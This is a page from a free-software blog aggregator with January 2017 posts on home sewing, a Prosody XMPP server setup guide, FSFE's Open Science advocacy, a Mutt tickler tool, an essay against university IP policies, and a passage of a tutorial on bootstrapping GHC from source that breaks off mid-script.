Planet Fellowship (en)

Sunday, 22 January 2017

New pajama

Elena ``of Valhalla'' | 15:43, Sunday, 22 January 2017

New pajama

I may have been sewing myself a new pajama.

Immagine/fotohttp://social.gl-como.it/photos/valhalla/image/81b600789aa02a91fdf62f54a71b1ba0

It was plagued with issues; one of the sleeve is wrong side out and I only realized it when everything was almost done (luckily the pattern is symmetric and it is barely noticeable) and the swirl moved while I was sewing it on (and the sewing machine got stuck multiple times: next time I'm using interfacing, full stop.), and it's a bit deformed, but it's done.

For the swirl, I used Inkscape to Simplify (Ctrl-L) the original Debian Swirl a few times, removed the isolated bits, adjusted some spline nodes by hand and printed on paper. I've then cut, used water soluble glue to attach it to the wrong side of a scrap of red fabric, cut the fabric, removed the paper and then pinned and sewed the fabric on the pajama top.
As mentioned above, the next time I'm doing something like this, some interfacing will be involved somewhere, to keep me sane and the sewing machine happy.

Blogging, because it is somewhat relevant to Free Software :) and there are even sources https://www.trueelena.org/clothing/projects/pajamas_set.html#downloads, under a DFSG-Free license :)

Thursday, 19 January 2017

Which movie most accurately forecasts the Trump presidency?

DanielPocock.com - fsfe | 19:31, Thursday, 19 January 2017

Many people have been scratching their heads wondering what the new US president will really do and what he really stands for. His alternating positions on abortion, for example, suggest he may simply be telling people what he thinks is most likely to win public support from one day to the next. Will he really waste billions of dollars building a wall? Will Muslims really be banned from the US?

As it turns out, several movies provide a thought-provoking insight into what could eventuate. What's more, these two have a creepy resemblance to the Trump phenomenon and many of the problems in the world today.

Countdown to Looking Glass

On the classic cold war theme of nuclear annihilation, Countdown to Looking Glass is probably far more scary to watch on Trump eve than in the era when it was made. Released in 1984, the movie follows a series of international crises that have all come to pass: the assassination of a US ambassador in the middle east, a banking crisis and two superpowers in an escalating conflict over territory. The movie even picked a young Republican congressman for a cameo role: he subsequently went on to become speaker of the house. To relate it to modern times, you may need to imagine it is China, not Russia, who is the adversary but then you probably won't be able to sleep after watching it.

cleaning out the swamp?

The Omen

Another classic is The Omen. The star of this series of four horror movies, Damien Thorn, appears to have a history that is eerily reminiscent of Trump: born into a wealthy family, a series of disasters befall every honest person he comes into contact with, he comes to control a vast business empire acquired by inheritance and as he enters the world of politics in the third movie of the series, there is a scene in the Oval Office where he is flippantly advised that he shouldn't lose any sleep over any conflict of interest arising from his business holdings. Did you notice Damien Thorn and Donald Trump even share the same initials, DT?

Friday, 13 January 2017

Modern XMPP Server

Elena ``of Valhalla'' | 12:59, Friday, 13 January 2017

Modern XMPP Server

I've published a new HOWTO on my website 'http://www.trueelena.org/computers/howto/modern_xmpp_server.html':

http://www.enricozini.org/blog/2017/debian/modern-and-secure-instant-messaging/ already wrote about the Why (and the What, Who and When), so I'll just quote his conclusion and move on to the How.

I now have an XMPP setup which has all the features of the recent fancy chat systems, and on top of that it runs, client and server, on Free Software, which can be audited, it is federated and I can self-host my own server in my own VPS if I want to, with packages supported in Debian.


How



I've decided to install https://prosody.im/, mostly because it was recommended by the RTC QuickStart Guide http://rtcquickstart.org/; I've heard that similar results can be reached with https://www.ejabberd.im/ and other servers.

I'm also targeting https://www.debian.org/ stable (+ backports); as I write this is jessie; if there are significant differences I will update this article when I will upgrade my server to stretch. Right now, this means that I'm using prosody 0.9 (and that's probably also the version that will be available in stretch).

Installation and prerequisites



You will need to enable the https://backports.debian.org/ repository and then install the packages prosody and prosody-modules.

You also need to setup some TLS certificates (I used Let's Encrypt https://letsencrypt.org/); and make them readable by the prosody user; you can see Chapter 12 of the RTC QuickStart Guide http://rtcquickstart.org/guide/multi/xmpp-server-prosody.html for more details.

On your firewall, you'll need to open the following TCP ports:


  • 5222 (client2server)

  • 5269 (server2server)

  • 5280 (default http port for prosody)

  • 5281 (default https port for prosody)



The latter two are needed to enable some services provided via http(s), including rich media transfers.

With just a handful of users, I didn't bother to configure LDAP or anything else, but just created users manually via:

prosodyctl adduser alice@example.org

In-band registration is disabled by default (and I've left it that way, to prevent my server from being used to send spim https://en.wikipedia.org/wiki/Messaging_spam).

prosody configuration



You can then start configuring prosody by editing /etc/prosody/prosody.cfg.lua and changing a few values from the distribution defaults.

First of all, enforce the use of encryption and certificate checking both for client2server and server2server communications with:


c2s_require_encryption = true
s2s_secure_auth = true



and then, sadly, add to the whitelist any server that you want to talk to and doesn't support the above:


s2s_insecure_domains = { "gmail.com" }


virtualhosts



For each virtualhost you want to configure, create a file /etc/prosody/conf.avail/chat.example.org.cfg.lua with contents like the following:


VirtualHost "chat.example.org"
enabled = true
ssl = {
key = "/etc/ssl/private/example.org-key.pem";
certificate = "/etc/ssl/public/example.org.pem";
}


For the domains where you also want to enable MUCs, add the follwing lines:


Component "conference.chat.example.org" "muc"
restrict_room_creation = "local"


the "local" configures prosody so that only local users are allowed to create new rooms (but then everybody can join them, if the room administrator allows it): this may help reduce unwanted usages of your server by random people.

You can also add the following line to enable rich media transfers via http uploads (XEP-0363):


Component "upload.chat.trueelena.org" "http_upload"

The defaults are pretty sane, but see https://modules.prosody.im/mod_http_upload.html for details on what knobs you can configure for this module

Don't forget to enable the virtualhost by linking the file inside /etc/prosody/conf.d/.

additional modules



Most of the other interesting XEPs are enabled by loading additional modules inside /etc/prosody/prosody.cfg.lua (under modules_enabled); to enable mod_something just add a line like:


"something";

Most of these come from the prosody-modules package (and thus from https://modules.prosody.im/ ) and some may require changing when prosody 0.10 will be available; when this is the case it is mentioned below.



  • mod_carbons (XEP-0280)
    To keep conversations syncronized while using multiple devices at the same time.

    This will be included by default in prosody 0.10.



  • mod_privacy + mod_blocking (XEP-0191)
    To allow user-controlled blocking of users, including as an anti-spim measure.

    In prosody 0.10 these two modules will be replaced by mod_privacy.



  • mod_smacks (XEP-0198)
    Allow clients to resume a disconnected session before a customizable timeout and prevent message loss.



  • mod_mam (XEP-0313)
    Archive messages on the server for a limited period of time (default 1 week) and allow clients to retrieve them; this is required to syncronize message history between multiple clients.

    With prosody 0.9 only an in-memory storage backend is available, which may make this module problematic on servers with many users. prosody 0.10 will fix this by adding support for an SQL backed storage with archiving capabilities.



  • mod_throttle_presence + mod_filter_chatstates (XEP-0352)
    Filter out presence updates and chat states when the client announces (via Client State Indication) that the user isn't looking. This is useful to reduce power and bandwidth usage for "useless" traffic.




@Gruppo Linux Como @LIFO

Wednesday, 11 January 2017

Standing Strong as a Team

Marcus's Blog | 15:11, Wednesday, 11 January 2017

I work at a large university in Switzerland. We are also responsible for Online Exams which are held on our GNU/Linux setup. As during exams bad technical things could possibly happen we have to be available. Since the last year we have to be located in the same building as where exams are held (which is not my regular office building).

This has always been stressful to me as well, because hard crashes of the infrastructure will have a large impact. If everything goes wrong it might affect up to 200 – 500 students.

Today we had one of those exams and we have upped our team presence to four people in 3rd level as well as 2nd and 1st level. Everything went well and it gave me a really good feeling that we are such a strong team and can rely on each other.

So what’s the conclusion of this post? I have learned that things that might look frightening at first view, might work really smooth if you got colleagues on which you can rely on. Things that might look impossible for one alone are possible with a the help of a good team and friends.

Push Free Software and Open Science for Horizon2020

English Planet – Dreierlei | 12:34, Wednesday, 11 January 2017

Summary: please help us to get the idea about the importance of Free Software as a condition for Open Science into the mind of stakeholders and decision-takers of the Horizon2020 program. You can do so by participating in the interim evaluation and re-using FSFE’s position paper.

What came to my mind the first times that I read “Open Science” was that this term should not be necessary in the first place. In common understanding as well as in its self-conception, “openness” is the elementary part of all science. “Openness” in a sense that all scientific results shall be published publicly along with experimental settings, methods and anything else that leads to their results. It is exactly this approach that – in theory – gives everyone the chance to reproduce the experiment and get to the same results.

But although this approach of openness might still be the noble objective of any scientist, the general idea of a publicly available science is called into question since at least the de-facto domination of publishers over science journals and the creation of a profit-oriented market-design. It cannot be the point of this blogpost to roll out the problematic situation in that nowadays the consumers and the content creators both have to pay publishers for overpriced science journals, financed with public money. Instead, at this point, most important is that these high prices are contrary to the idea of universal access to science as they give access only to those who can afford it.

<figure class="wp-caption aligncenter" id="attachment_1889" style="width: 300px"><figcaption class="wp-caption-text">Send and receive Open Science?</figcaption></figure>

Fortunately, Open Access came up to do something about this problem. Similar to Free Software, Open Access uses free licenses to offer access to science publications to everyone around the globe. That is why Open Access is an important step towards the universal access of science. Unfortunately, in a digital world, Open Access is just one of many tools that we have to use to achieve an Open Science. Equally important is the format and software that is used. Also, Open Access only covers the final publication and misses to cover the steps that lead to there. This is where Open Science steps in.

Why Free Software matters in Open Science

It should be clear that Open Science – unlike Open Access – does not only relate to a publication form of the results of a research. Open Science aims to cover and open up the whole research process from the method design to data gathering to calculations to its final publication. What means that thanks to the digitalization, since some decades we now have a new issue in the opening of the scientific process and this is the software that is used. Software is an integral part of basically all sciences nowadays and nearly all steps involved in a research project are in need and covered by the use of software.

And here is the point: Proprietary software cannot offer the approach of openness that is needed to keep scientific experiments and results transparent and reproducible. Only Free Software offers the possibility to study and reuse the software that was used for the research in question and therewith universal access to science. Only Free Software offers transparency and therewith the possibility to check the methods (e.g. mathematical calculations of the software in use) that have been used to achieve the results. And only Free Software offers collaboration and independence of science and secures long-time archiving of results at the same time. (If you like to dig deeper into the argumentation how Open Science is in need of Free Software, read my previous blogpost on this).

How to push for Free Software in Horizon2020

Horizon2020 is the biggest public science funding in the European Union, run by the European Commission. Fortunately, Open Science is one of the main principles promoted by Horizon2020 to further unlock the full potential of innovation in Europe. Currently, Horizon2020 is running an interim evaluation to help formulate the next EU research and innovation funding post-2020. So this is the best moment in time to raise awareness about the importance of Free Software and Open Standards for Open Science for the next funding period.

<figure class="wp-caption aligncenter" id="attachment_1920" style="width: 300px">Horizon2020 logo<figcaption class="wp-caption-text">Let’s put Free and Open in Horizon 2020</figcaption></figure>

To get this message and idea to the decision-takers inside the European Commission, at the FSFE we wrote a position paper why Free Software matters for Open Science including concrete proposals and best methods of how to implement Free Software into the Horizon2020 framework. To further support our demands we additionally filed in a Freedom of Information request to the European Commission’s Directorate-General for Research and Innovation to ask about the use, development and release of (Free) software under Horizon2020.

If you are convinced now, please help us to get the idea about the importance of Free Software as a condition for Open Science into the mind of stakeholders and decision-takers of the Horizon2020 program. You can do so by participating in the consultation and re-using FSFE’s position paper (PDF). Literally, you can fill in your personal details, skip all questions and in the end upload FSFE’s position paper. This is the 5-minute-stop and we explained it for you in our wiki. Or you read through our position paper, take it as an inspiration and you upload a modified version of it. Please, find all information necessary including links to the sources in FSFE’s wiki.

Thank you very much for helping to open up European science by using Free Software!

Related articles:

Boomerang for Mutt

free software - Bits of Freedom | 08:15, Wednesday, 11 January 2017

Boomerang for Mutt

If you're anything like me, an overflowing inbox stresses you. When the emails in my inbox start filling more than a screen, I lose focus. This is particularly troubling as I'm also using my inbox as a reminder about issues I need to look at: travel bookings, meetings to be booked, inquiries to be made at the right time, and so on. A lot of emails about things I don't actually need to do anything about right now.

Last week, I was delighted to find Noah Tilton having created a convenient tool for a Tickler file (as popularized by the book Getting things Done by David Allen) for Maildir MUAs such as Mutt. If you're a bit more Gmail-snazzy, you may recognize the same concept from Boomerang for Gmail.

The basic ideas is this: not everything in your INBOX needs to be acted on right now. The things which don't need to be acted on now take attention away from what you should be doing. So you want to move them away, but have them appear again at a particular time: next week, in December, tomorrow, or so.

What Noah's tickler-mail does is it allows you to keep one Maildir folder as a tickler file. I call this one todo, so everything in ~/Maildir/todo/ is my tickler file. Within this tickler file, I save emails in a subfolder with a human-readable description, such as "next-week", "next-month", or "25th-of-december" (~/Maildir/todo/next-week/, ~/Maildir/todo/next-month/, ~/Maildir/todo/25th-of-december).

The tickler-mail utility then parses these human-readable descriptions with Python's parsedatetime library and compares the result with the change timestamp of the email. If the indicated amount of time has passed, it moves the email to the INBOX where and adds an additional "X-Tickler" header to it to indicate it's a tickler file email. With this .muttrc recipe, the e-mail is then shown clearly in red so I can easily and quickly tell which are new and which have come in from the tickler file:

color index red black '~h "X-Tickler:.*"'

Monday, 09 January 2017

The Academic Barriers of Commercialisation

Paul Boddie's Free Software-related blog » English | 22:27, Monday, 09 January 2017

Last year, the university through which I obtained my degree celebrated a “milestone” anniversary, meaning that I got even more announcements, notices and other such things than I was already getting from them before. Fortunately, not everything published into this deluge is bound up in proprietary formats (as one brochure was, sitting on a Web page in Flash-only form) or only reachable via a dubious “Libyan link-shortener” (as certain things were published via a social media channel that I have now quit). It is indeed infuriating to see one of the links in a recent HTML/plain text hybrid e-mail message using a redirect service hosted on the university’s own alumni sub-site, sending the reader to a bit.ly URL, which will redirect them off into the great unknown and maybe even back to the original site. But such things are what one comes to expect on today’s Internet with all the unquestioning use of random “cloud” services, each one profiling the unsuspecting visitor and betraying their privacy to make a few extra cents or pence.

But anyway, upon following a more direct – but still redirected – link to an article on the university Web site, I found myself looking around to see what gets published there these days. Personally, I find the main university Web site rather promotional and arguably only superficially informative – you can find out the required grades to take courses along with supposed student approval ratings and hypothetical salary expectations upon qualifying – but it probably takes more digging to get at the real detail than most people would be willing to do. I wouldn’t mind knowing what they teach now in their computer science courses, for instance. I guess I’ll get back to looking into that later.

Gatekeepers of Knowledge

However, one thing did catch my eye as I browsed around the different sections, encountering the “technology transfer” department with the expected rhetoric about maximising benefits to society: the inevitable “IP” policy in all its intimidating length, together with an explanatory guide to that policy. Now, I am rather familiar with such policies from my time at my last academic employer, having been obliged to sign some kind of statement of compliance at one point, but then apparently not having to do so when starting a subsequent contract. It was not as if enlightenment had come calling at the University of Oslo between these points in time such that the “IP rights” agreement now suddenly didn’t feature in the hiring paperwork; it was more likely that such obligations had presumably been baked into everybody’s terms of employment as yet another example of the university upper management’s dubious organisational reform and questionable human resources practices.

Back at Heriot-Watt University, credit is perhaps due to the authors of their explanatory guide to try and explain the larger policy document, because it is most likely that most people aren’t going to get through that much longer document and retain a clear head. But one potentially unintended reason for credit is that by being presented with a much less opaque treatment of the policy and its motivations, we are able to see with enhanced clarity many of the damaging misconceptions that have sadly become entrenched in higher education and academia, including the ways in which such policies actually do conflict with the sharing of knowledge that academic endeavour is supposed to be all about.

So, we get the sales pitch about new things needing investment…

However, often new technologies and inventions are not fully developed because development needs investment, and investment needs commercial returns, and to ensure commercial returns you need something to sell, and a freely available idea cannot be sold.

If we ignore various assumptions about investment or the precise economic mechanisms supposedly required to bring about such investment, we can immediately note that ideas on their own aren’t worth anything anyway, freely available or not. Although the Norwegian Industrial Property Office (or the Norwegian Patent Office if we use a more traditional name) uses the absurd vision slogan “turning ideas into values” (it should probably read “value”, but whatever), this perhaps says more about greedy profiteering through the sale of government-granted titles bound to arbitrary things than it does about what kinds of things have any kind of inherent value that you can take to the bank.

But assuming that we have moved beyond the realm of simple ideas and have entered the realm of non-trivial works, we find that we have also entered the realm of morality and attitude management:

That is why, in some cases, it is better for your efforts not to be published immediately, but instead to be protected and then published, for protection gives you something to sell, something to sell can bring in investment, and investment allows further development. Therefore in the interests of advancing the knowledge within the field you work in, it is important that you consider the commercial potential of your work from the outset, and if necessary ensure it is properly protected before you publish.

Once upon a time, the most noble pursuit in academic research was to freely share research with others so that societal, scientific and technological progress could be made. Now it appears that the average researcher should treat it as their responsibility to conceal their work from others, seek “protection” on it, and then release the encumbered details for mere perusal and the conditional participation of those once-valued peers. And they should, of course, be wise to the commercial potential of the work, whatever that is. Naturally, “intellectual property” offices in such institutions have an “if in doubt, see us” policy, meaning that they seek to interfere with research as soon as possible, and should someone fail to have “seen them”, that person’s loyalty may very well be called into question as if they had somehow squandered their employer’s property. In some institutions, this could very easily get people marginalised or “reorganised” if not immediately or obviously fired.

The Rewards of Labour

It is in matters of property and ownership where things get very awkward indeed. Many people would accept that employees of an organisation are producing output that becomes the property of that organisation. What fewer people might accept is that the customers of an organisation are also subject to having their own output taken to be the property of that organisation. The policy guide indicates that even undergraduate students may also be subject to an obligation to assign ownership of their work to the university: those visiting the university supposedly have to agree to this (although it doesn’t say anything about what their “home institution” might have to say about that), and things like final year projects are supposedly subject to university ownership.

So, just because you as a student have a supervisor bound by commercialisation obligations, you end up not only paying tuition fees to get your university education (directly or through taxation), but you also end up having your own work taken off you because it might be seen as some element in your supervisor’s “portfolio”. I suppose this marks a new low in workplace regulation and standards within a sector that already skirts the law with regard to how certain groups are treated by their employers.

One can justifiably argue that employees of academic institutions should not be allowed to run away with work funded by those institutions, particularly when such funding originally comes from other sources such as the general public. After all, such work is not exactly the private property of the researchers who created it, and to treat it as such would deny it to those whose resources made it possible in the first place. Any claims about “rightful rewards” needing to be given are arguably made to confuse rational thinking on the matter: after all, with appropriate salaries, the researchers are already being rewarded doing work that interests and stimulates them (unlike a lot of people in the world of work). One can argue that academics increasingly suffer from poorer salaries, working conditions and career stability, but such injustices are not properly remedied by creating other injustices to supposedly level things out.

A policy around what happens with the work done in an academic institution is important. But just as individuals should not be allowed to treat broadly-funded work as their own private property, neither should the institution itself claim complete ownership and consider itself entitled to do what it wishes with the results. It may be acting as a facilitator to allow research to happen, but by seeking to intervene in the process of research, it risks acting as an inhibitor. Consider the following note about “confidential information”:

This is, in short, anything which, if you told people about, might damage the commercial interests of the university. It specifically includes information relating to intellectual property that could be protected, but isn’t protected yet, and which if you told people about couldn’t be protected, and any special know how or clever but non patentable methods of doing things, like trade secrets. It specifically includes all laboratory notebooks, including those stored in an electronic fashion. You must be very careful with this sort of information. This is of particular relevance to something that may be patented, because if other people know about it then it can’t be.

Anyone working in even a moderately paranoid company may have read things like this. But here the context is an environment where knowledge should be shared to benefit and inform the research community. Instead, one gets the impression that the wish to control the propagation of knowledge is so great that some people would rather see the details of “clever but non patentable methods” destroyed than passed on openly for others to benefit from. Indeed, one must question whether “trade secrets” should even feature in a university environment at all.

Of course, the obsession with “laboratory notebooks”, “methods of doing things” and “trade secrets” in such policies betrays the typical origins of such drives for commercialisation: the apparently rich pickings to be had in the medical, pharmaceutical and biosciences domains. It is hardly a coincidence that the University of Oslo intensified its dubious “innovation” efforts under a figurehead with a background (or an interest) in exactly those domains: with a narrow personal focus, an apparent disdain for other disciplines, and a wider commercial atmosphere that gives such a strategy a “dead cert” air of impending fortune, we should perhaps expect no more of such a leadership creature (and his entourage) than the sum of that creature’s instincts and experiences. But then again, we should demand more from such people when their role is to cultivate an institution of learning and not to run a private research organisation at the public’s expense.

The Dirty Word

At no point in the policy guide does the word “monopoly” appear. Given that such a largely technical institution would undoubtedly be performing research where the method of “protection” would involve patents being sought, omitting the word “monopoly” might be that document’s biggest flaw. Heriot-Watt University originates from the merger of two separate institutions, one of which was founded by the well-known pioneer of steam engine technology, James Watt.

Recent discussion of Watt’s contributions to the development and proliferation of such technology has brought up claims that Watt’s own patents – the things that undoubtedly made him wealthy enough to fund an educational organisation – actually held up progress in the domain concerned for a number of decades. While he was clearly generous and sensible enough to spend his money on worthy causes, one can always challenge whether the questionable practices that resulted in the accumulation of such wealth can justify the benefits from the subsequent use of that wealth, particularly if those practices can be regarded as having had negative effects of society and may even have increased wealth inequality.

Questioning philanthropy is not a particularly fashionable thing to do. In capitalist societies, wealthy people are often seen as having made their fortunes in an honest fashion, enjoying a substantial “benefit of the doubt” that this was what really occurred. Criticising a rich person giving money to ostensibly good causes is seen as unkind to both the generous donor and to those receiving the donations. But we should question the means through which the likes of Bill Gates (in our time) and James Watt (in his own time) made their fortunes and the power that such fortunes give to such people to direct money towards causes of their own personal choosing, not to mention the way in which wealthy people also choose to influence public policy and the use of money given by significantly less wealthy individuals – the rest of us – gathered through taxation.

But back to monopolies. Can they really be compatible with the pursuit and sharing of knowledge that academia is supposed to be cultivating? Just as it should be shocking that secretive “confidentiality” rules exist in an academic context, it should appal us that researchers are encouraged to be competitively hostile towards their peers.

Removing the Barriers

It appears that some well-known institutions understand that the unhindered sharing of their work is their primary mission. MIT Media Lab now encourages the licensing of software developed under its roof as Free Software, not requiring special approval or any other kind of institutional stalling that often seems to take place as the “innovation” vultures pick over the things they think should be monetised. Although proprietary licensing still appears to be an option for those within the Media Lab organisation, at least it seems that people wanting to follow their principles and make their work available as Free Software can do so without being made to feel bad about it.

As an academic institution, we believe that in many cases we can achieve greater impact by sharing our work.

So says the director of the MIT Media Lab. It says a lot about the times we live in that this needs to be said at all. Free Software licensing is, as a mechanism to encourage sharing, a natural choice for software, but we should also expect similar measures to be adopted for other kinds of works. Papers and articles should at the very least be made available using content licences that permit sharing, even if the licence variants chosen by authors might seek to prohibit the misrepresentation of parts of their work by prohibiting remixes or derived works. (This may sound overly restrictive, but one should consider the way in which scientific articles are routinely misrepresented by climate change and climate science deniers.)

Free Software has encouraged an environment where sharing is safely and routinely done. Licences like the GNU General Public Licence seek to shield recipients from things like patent threats, particularly from organisations which might appear to want to share their works, but which might be tempted to use patents to regulate the further use of those works. Even in realms where patents have traditionally been tolerated, attempts have been made to shield others from the effects of patents, intended or otherwise: the copyleft hardware movement demands that shared hardware designs are patent-free, for instance.

In contrast, one might think that despite the best efforts of the guide’s authors, all the precautions and behavioural self-correction it encourages might just drive the average researcher to distraction. Or, just as likely, to ignoring most of the guidelines and feigning ignorance if challenged by their “innovation”-obsessed superiors. But in the drive to monetise every last ounce of effort there is one statement that is worth remembering:

If intellectual property is not assigned, this can create problems in who is allowed to exploit the work, and again work can go to waste due to a lack of clarity over who owns what.

In other words, in an environment where everybody wants a share of the riches, it helps to have everybody’s interests out in the open so that there may be no surprises later on. Now, it turns out that unclear ownership and overly casual management of contributions is something that has occasionally threatened Free Software projects, resulting in more sophisticated thinking about how contributions are managed.

And it is precisely this combination of Free Software licensing, or something analogous for other domains, with proper contribution and attribution management that will extend safe and efficient sharing of knowledge to the academic realm. Researchers just cannot have the same level of confidence when dealing with the “technology transfer” offices of their institution and of other institutions. Such offices only want to look after themselves while undermining everyone beyond the borders of their own fiefdoms.

Divide and Rule

It is unfortunate that academic institutions feel that they need to “pull their weight” and have to raise funds to make up for diminishing public funding. By turning their backs on the very reason for their own existence and seeking monopolies instead of sharing knowledge, they unwittingly participate in the “divide and rule” tactics blatantly pursued in the political arena: that everyone must fight each other for all that is left once the lion’s share of public funding has been allocated to prestige megaprojects and schemes that just happen to benefit the well-connected, the powerful and the influential people in society the most.

A properly-funded education sector is an essential component of a civilised society, and its institutions should not be obliged to “sharpen their elbows” in the scuffle for funding and thus deprive others of knowledge just to remain viable. Sadly, while austerity politics remains fashionable, it may be up to us in the Free Software realm to remind academia of its obligations and to show that sustainable ways of sharing knowledge exist and function well in the “real world”.

Indeed, it is up to us to keep such institutions honest and to prevent advocates of monopoly-driven “innovation” from being able to insist that their way is the only way, because just as “divide and rule” politics erects barriers between groups in wider society, commercialisation erects barriers that inhibit the essential functions of academic pursuit. And such barriers ultimately risk extinguishing academia altogether, along with all the benefits its institutions bring to society. If my university were not reinforcing such barriers with its “IP” policy, maybe its anniversary as a measure of how far we have progressed from monopolies and intellectual selfishness would have been worth celebrating after all.

Sunday, 08 January 2017

Bootstrapping Haskell: part 1

Rekado | 23:00, Sunday, 08 January 2017

Haskell is a formally specified language with potentially many alternative implementations, but in early 2017 the reality is that Haskell is whatever the Glasgow Haskell Compiler (GHC) implements. Unfortunately, to build GHC one needs a previous version of GHC. This is true for all public releases of GHC all the way back to version 0.29, which was released in 1996 and which implements Haskell 1.2. Some GHC releases include files containing generated ANSI C code, which require only a C compiler to build. For most purposes, generated code does not qualify as source code.

So I wondered: is it possible to construct a procedure to build a modern release of GHC from source without depending on any generated code or pre-built binaries of an older variant of GHC? The answer to this question depends on the answers to a number of related questions. One of them is: are there any alternative Haskell implementations that are still usable today and that can be built without GHC?

A short survey of Haskell implementations

Although nowadays hardly anyone uses any other Haskell compiler but GHC in production there are some alternative Haskell implementations that were protected from bit rot and thus can still be built from source with today’s common toolchains.

One of the oldest implementations is Yale Haskell, a Haskell system embedded in Common Lisp. The last release of Yale Haskell was version 2.0.5 in the early 1990s.1 Yale Haskell runs on top of CMU Common Lisp, Lucid Common Lisp, Allegro Common Lisp, or Harlequin LispWorks, but since I do not have access to any of these proprietary Common Lisp implementations, I ported the Yale Haskell system to GNU CLISP. The code for the port is available here. Yale Haskell is not a compiler, it can only be used as an interpreter.

Another Haskell interpreter with a more recent release is Hugs. Hugs is written in C and implements almost all of the Haskell 98 standard. It also comes with a number of useful language extensions that GHC and other Haskell systems depend on. Unfortunately, it cannot deal with mutually recursive module dependencies, which is a feature that even the earliest versions of GHC rely on. This means that running a variant of GHC inside of Hugs is not going to work without major changes.

An alternative Haskell compiler that does not need to be built with GHC is nhc98. Its latest release was in 2010, which is much more recent than any of the other Haskell implementations mentioned so far. nhc98 is written in Haskell, so a Haskell compiler or interpreter is required to build it. Like GHC the release of nhc98 comes with files containing generated C code, but depending on them for a clean bootstrap is almost as bad as depending on a third-party binary. Sadly, nhc98 has another shortcoming: it is restricted to 32-bit machine architectures.

An early bootstrapping idea

Since nhc98 is written in C (the runtime) and standard Haskell 98, we can run the Haskell parts of the compiler inside of a Haskell 98 interpreter. Luckily, we have an interpreter that fits the bill: Hugs! If we can interpret and run enough parts of nhc98 with Hugs we might be able to use nhc98 on Hugs to build a native version of nhc98 and related tools (such as cpphs, hmake, and cabal). Using the native compiler we can build a complete toolchain and just maybe that’s enough to build an early version of GHC. Once we have an early version of GHC we can go ahead and build later versions with ease. (Building GHC directly using nhc98 on Hugs might also work, but due to complexity in GHC modules it seems better to avoid depending on Hugs at runtime.)

At this point I have verified that (with minor modifications) nhc98 can indeed be run on top of Hugs and that (with enough care to pre-processing and dependency ordering) it can build a native library from the Haskell source files of the nhc98 prelude. It is not clear whether nhc98 would be capable of building a version of GHC and how close to a modern version GHC we can get with just nhc98. There are also problems with the nhc98 runtime on modern x8664 systems (more on that at the end).

Setting up the environment

Before we can start let’s prepare a suitable environment. Since nhc98 can only be used on 32-bit architectures we need a GCC toolchain for i686. With GNU Guix it’s easy to set up a temporary environment containing just the right tools: the GCC toolchain, make, and Hugs.

guix environment --system=i686-linux \
                 --ad-hoc gcc-toolchain@4 make hugs

Building the runtime

Now we can configure nhc98 and build the C runtime, which is needed to link the binary objects that nhc98 and GCC produce when compiling Haskell sources. Configuration is easy:

cd /path/to/nhc98-1.22
export NHCDIR=$PWD
./configure

Next, we build the C runtime:

cd src/runtime
make

This produces binary objects in an architecture-specific directory. In my case this is targets/x86_64-Linux.

Building the prelude?

The standard library in Haskell is called the prelude. Most source files of nhc98 depend on the prelude in one way or another. Although Hugs comes with its own prelude it is of little use for our purposes as components of nhc98 must be linked with a static prelude library object. Hugs does not provide a suitable object that we could link to.

To build the prelude we need a Haskell compiler that has the same call interface as nhc98. Interestingly, much of the nhc98 compiler’s user interface is implemented as a shell script, which after extensive argument processing calls nhc98comp to translate Haskell source files into C code, and then runs GCC over the C files to create binary objects. Since we do not have nhc98comp at this point, we need to fake it with Hugs (more on that later).

Detour: cpphs and GreenCard

Unfortunately, this is not the only problem. Some of the prelude’s source files require pre-processing by a tool called GreenCard, which generates boilerplate FFI code. Of course, GreenCard is written in Haskell. Since we cannot build a native GreenCard binary without the native nhc98 prelude library, we need to make GreenCard run on Hugs. Some of the GreenCard sources require pre-processing with cpphs. Luckily, that’s just a really simple Haskell script, so running it in Hugs is trivial. We will need cpphs later again, so it makes sense to write a script for it. Let’s call it hugs-cpphs and drop it in ${NHCDIR}.

#!/bin/bash

runhugs ${NHCDIR}/src/cpphs/cpphs.hs --noline -D__HASKELL98__ "$@"

Make it executable:

chmod +x hugs-cpphs

Okay, let’s first pre-process the GreenCard sources with cpphs. To do that I ran the following commands:

cd ${NHCDIR}/src/greencard

CPPPRE="${NHCDIR}/hugs-cpphs -D__NHC__"

FILES="DIS.lhs \
 HandLex.hs \
 ParseLib.hs \
 HandParse.hs \
 FillIn.lhs \
 Proc.lhs \
 NHCBackend.hs \
 NameSupply.lhs \
 Process.lhs"

for file in $FILES; do
    cp $file $file.original && $CPPPRE $file.original > $file && rm $file.original
done

The result is a bunch of GreenCard source files without these pesky CPP pre-processor directives. Hugs can pre-process sources on the fly, but this makes evaluation orders of magnitude slower. Pre-processing the sources once before using them repeatedly seems like a better choice.

There is still a minor problem with GreenCard on Hugs. The GreenCard sources import the module NonStdTrace, which depends on built-in prelude functions from nhc98. Obviously, they are not available when running on Hugs (it has its own prelude implementation), so we need to provide an alternative using just the regular Hugs prelude. The following snippet creates a file named src/prelude/NonStd/NonStdTraceBootstrap.hs with the necessary changes.

cd ${NHCDIR}/src/prelude/NonStd/
sed -e &aposs|NonStdTrace|NonStdTraceBootstrap|&apos \
    -e &aposs|import PreludeBuiltin||&apos \
    -e &aposs|_||g&apos NonStdTrace.hs > NonStdTraceBootstrap.hs

Then we change a single line in src/greencard/NHCBackend.hs to make it import NonStdTraceBootstrap instead of NonStdTrace.

cd ${NHCDIR}/src/greencard
sed -i -e &aposs|NonStdTrace|NonStdTraceBootstrap|&apos NHCBackend.hs

To run GreenCard we still need a driver script. Let’s call this hugs-greencard and place it in ${NHCDIR}:

#!/bin/bash

HUGSDIR="$(dirname $(readlink -f $(which runhugs)))/../"
SEARCH_HUGS=$(printf "${NHCDIR}/src/%s/*:" compiler prelude libraries)

runhugs -98 \
        -P${HUGSDIR}/lib/hugs/packages/*:${NHCDIR}/include/*:${SEARCH_HUGS} \
        ${NHCDIR}/src/greencard/GreenCard.lhs \
        $@

Make it executable:

cd ${NHCDIR}
chmod +x hugs-greencard

Building the prelude!

Where were we? Ah, the prelude. As stated earlier, we need a working replacement for nhc98comp, which will be called by the driver script script/nhc98 (created by the configure script). Let’s call the replacement hugs-nhc, and again we’ll dump it in ${NHCDIR}. Here it is in all its glory:

#!/bin/bash

# Root directory of Hugs installation
HUGSDIR="$(dirname $(readlink -f $(which runhugs)))/../"

# TODO: "libraries" alone may be sufficient
SEARCH_HUGS=$(printf "${NHCDIR}/src/%s/*:" compiler prelude libraries)

# Filter everything from "+RTS" to "-RTS" from $@ because MainNhc98.hs
# does not know what to do with these flags.
ARGS=""
SKIP="false"
for arg in "$@"; do
